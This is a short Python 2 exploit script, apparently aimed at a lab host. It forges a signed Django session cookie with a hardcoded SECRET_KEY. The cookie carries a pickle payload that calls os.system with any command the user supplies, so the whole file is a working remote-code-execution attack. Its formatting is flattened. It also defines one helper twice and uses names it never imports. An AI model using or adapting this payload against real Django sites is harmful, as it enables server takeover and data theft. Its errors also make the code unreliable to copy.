# coding: UTF-8
# Written by Orange@chroot.org
#
import sys
import hmac
import time
import hashlib
import base64
from random import randint
import requests
URL = "http://vuln-django.orange.tw/"
SECRET_KEY = "1%idg#a2%byqh@l1wcv^3kc=e*($0v44(u-c^@bf_lz-@#essk"
SALT = "django.contrib.sessions.backends.signed_cookies"
def salted_hmac(key_salt, value, secret=None):
key = hashlib.sha1((key_salt + secret).encode('utf-8')).digest()
return hmac.new(key, msg=force_bytes(value), digestmod=hashlib.sha1)
def b64_encode(s):
return base64.urlsafe_b64encode(s).strip(b'=')
def b64_encode(s):
return base64.urlsafe_b64encode(s).strip(b'=')
def base64_hmac(salt, value, key):
return b64_encode(salted_hmac(salt, value, key).digest())
def force_bytes(s, encoding='utf-8', strings_only=False, errors='strict'):
if isinstance(s, bytes):
if encoding == 'utf-8':
return s
else:
return s.decode('utf-8', errors).encode(encoding, errors)
if strings_only and (s is None or isinstance(s, int)):
return s
if isinstance(s, Promise):
return six.text_type(s).encode(encoding, errors)
if not isinstance(s, six.string_types):
try:
if six.PY3:
return six.text_type(s).encode(encoding)
else:
return bytes(s)
except UnicodeEncodeError:
if isinstance(s, Exception):
return b' '.join([force_bytes(arg, encoding, strings_only,
errors) for arg in s])
return six.text_type(s).encode(encoding, errors)
else:
return s.encode(encoding, errors)
force_str = force_bytes
class Exploit:
def __init__(self, key, salt):
self.key = key
self.salt = salt
def signature(self, value):
signature = base64_hmac(self.salt + 'signer', value, self.key)
return force_str(signature)
if __name__ == '__main__':
if len( sys.argv ) < 2:
print 'Usage: python rce.py command'
exit()
cmd = sys.argv[1]
payload = b"cos\nsystem\n(S'%s'\ntR." % cmd
payload = '%s:%d' % (b64_encode( payload ), time.time() )
sig = Exploit(SECRET_KEY, SALT).signature( payload )
headers = { 'Cookie': 'sessionid="%s:%s";' % (payload, sig) }
url = '%s?%d' % ( URL, randint(0, 65535) )
requests.get( url, headers=headers )